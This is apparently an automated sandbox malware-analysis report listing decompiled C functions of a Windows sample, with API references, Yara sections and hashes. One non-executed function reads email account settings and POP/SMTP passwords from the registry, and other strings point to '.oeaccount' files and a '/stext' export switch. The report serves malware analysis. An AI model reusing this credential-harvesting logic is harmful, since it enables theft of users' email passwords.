                                                                        0x004078aa
                                                                        0x004078b8
                                                                        0x004078b9
                                                                        0x004078c2
                                                                        0x004078c3
                                                                        0x004078c8
                                                                        0x004078d6
                                                                        0x004078d7
                                                                        0x004078e0
                                                                        0x004078e1
                                                                        0x004078e6
                                                                        0x004078ec
                                                                        0x004078f1
                                                                        0x004078f9
                                                                        0x00000000
                                                                        0x004078f9
                                                                        0x004078fe

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@
                                                                        • String ID:
                                                                        • API String ID: 1033339047-0
                                                                        • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                        • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                        • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                        • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004060FA, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                        0x004060fa
                                                                        0x004060fb
                                                                        0x004060ff
                                                                        0x0040614a
                                                                        0x00406101
                                                                        0x00406102
                                                                        0x00406104
                                                                        0x00406108
                                                                        0x0040610a
                                                                        0x0040610c
                                                                        0x00406116
                                                                        0x0040611e
                                                                        0x00406120
                                                                        0x00406124
                                                                        0x0040612e
                                                                        0x00406133
                                                                        0x00406137
                                                                        0x0040613c
                                                                        0x00406146
                                                                        0x00406146

                                                                        APIs
                                                                        • malloc.MSVCRT ref: 00406116
                                                                        • memcpy.MSVCRT ref: 0040612E
                                                                        • free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: freemallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 3056473165-0
                                                                        • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                        • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                        • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                        • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}












                                                                        0x0040b8d7
                                                                        0x0040b8d7
                                                                        0x0040b8e0
                                                                        0x0040b8e4
                                                                        0x0040b8f5
                                                                        0x0040b8fb
                                                                        0x0040b900
                                                                        0x0040b909
                                                                        0x0040b920
                                                                        0x0040b90b
                                                                        0x0040b90e
                                                                        0x0040b91a
                                                                        0x0040b91a
                                                                        0x0040b910
                                                                        0x0040b915
                                                                        0x0040b915
                                                                        0x0040b91c
                                                                        0x0040b91c
                                                                        0x0040b925
                                                                        0x0040b926
                                                                        0x0040b92b
                                                                        0x0040b934
                                                                        0x0040b940
                                                                        0x0040b942
                                                                        0x0040b944
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040b936
                                                                        0x0040b938
                                                                        0x0040b946
                                                                        0x0040b949
                                                                        0x0040b950
                                                                        0x0040b955
                                                                        0x0040b95f
                                                                        0x0040b976
                                                                        0x0040b961
                                                                        0x0040b961
                                                                        0x0040b965
                                                                        0x0040b972
                                                                        0x0040b967
                                                                        0x0040b96d
                                                                        0x0040b96d
                                                                        0x0040b965
                                                                        0x0040b98b
                                                                        0x0040b998
                                                                        0x0040b9a1
                                                                        0x0040b9a2
                                                                        0x0040b9a8
                                                                        0x0040b9ac
                                                                        0x0040b9ac

                                                                        APIs
                                                                          • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                          • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                        • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen$_stricmpmemset
                                                                        • String ID: /stext
                                                                        • API String ID: 3575250601-3817206916
                                                                        • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                        • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                        • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                        • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                        0x00406264
                                                                        0x00406270
                                                                        0x00406277

                                                                        APIs
                                                                          • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                          • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFontIndirectmemsetstrcpy
                                                                        • String ID: Arial
                                                                        • API String ID: 3275230829-493054409
                                                                        • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                        • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                        • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                        • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}







                                                                        0x004047a0
                                                                        0x004047a2
                                                                        0x004047a8
                                                                        0x004047b0
                                                                        0x004047b6
                                                                        0x004047c0
                                                                        0x004047c8
                                                                        0x004047ce
                                                                        0x004047d0
                                                                        0x004047d0
                                                                        0x004047ce
                                                                        0x004047db
                                                                        0x004047e4
                                                                        0x004047e8
                                                                        0x004047e8
                                                                        0x004047f0

                                                                        APIs
                                                                          • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID:
                                                                        • API String ID: 145871493-0
                                                                        • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                        • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                        • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                        • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                          • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                          • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                          • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                        • String ID:
                                                                        • API String ID: 4165544737-0
                                                                        • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                        • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                        • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                        • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                        0x004047f1
                                                                        0x004047f9
                                                                        0x004047ff
                                                                        0x00404803
                                                                        0x00404806
                                                                        0x0040480c
                                                                        0x0040480c
                                                                        0x00404810

                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                        • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                        • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                        • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                        0x00405ef6
                                                                        0x00405efc

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                        • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                        • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                        • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                        0x0040e894
                                                                        0x0040e897
                                                                        0x0040e89d
                                                                        0x0040e8a0
                                                                        0x0040e8a6
                                                                        0x00000000
                                                                        0x0040e8a6
                                                                        0x0040e8aa

                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                        • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                        • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                        • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}



                                                                        0x0040eda0
                                                                        0x0040eda9

                                                                        APIs
                                                                        • EnumResourceNamesA.KERNEL32(?,?,0040ED0B,00000000), ref: 0040EDA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnumNamesResource
                                                                        • String ID:
                                                                        • API String ID: 3334572018-0
                                                                        • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                        • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                        • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                        • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                        0x00406f5b
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f6b
                                                                        0x00000000
                                                                        0x00406f6b
                                                                        0x00406f6e

                                                                        APIs
                                                                        • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFind
                                                                        • String ID:
                                                                        • API String ID: 1863332320-0
                                                                        • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                        • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                        • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                        • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                        0x0040614f
                                                                        0x0040615f

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                        • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                        • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                        • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                        0x0040eb52
                                                                        0x0040eb58

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                        • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                        • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                        • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                        0x00402d9a
                                                                        0x00402d9a
                                                                        0x00402d9a
                                                                        0x00402dad
                                                                        0x00402db7
                                                                        0x00402dc0
                                                                        0x00402dc7
                                                                        0x00402dca
                                                                        0x00402dcd
                                                                        0x00402dd8
                                                                        0x00402ddf
                                                                        0x00402de0
                                                                        0x00402de6
                                                                        0x00402df2
                                                                        0x00402df3
                                                                        0x00402df8
                                                                        0x00402dfb
                                                                        0x00402e07
                                                                        0x00402e0a
                                                                        0x00402e14
                                                                        0x00402e2a
                                                                        0x00402e40
                                                                        0x00402e56
                                                                        0x00402e67
                                                                        0x00402e78
                                                                        0x00402e9d
                                                                        0x00402e9f
                                                                        0x00402e9f
                                                                        0x00402eb1
                                                                        0x00402ec4
                                                                        0x00402eda
                                                                        0x00402ef0
                                                                        0x00402f04
                                                                        0x00402f18
                                                                        0x00402f3d
                                                                        0x00402f3f
                                                                        0x00402f3f
                                                                        0x00402f43
                                                                        0x00402f51
                                                                        0x00402f5e
                                                                        0x00402f63
                                                                        0x00402f6c
                                                                        0x00402f74
                                                                        0x00402f74
                                                                        0x00402f80
                                                                        0x00402f89
                                                                        0x00402f89
                                                                        0x00402f8e
                                                                        0x00402f93
                                                                        0x00402f9b
                                                                        0x00402f9b
                                                                        0x00402fa7
                                                                        0x00402fb0
                                                                        0x00402fb0
                                                                        0x00000000
                                                                        0x00402fb8
                                                                        0x00402fbf

                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
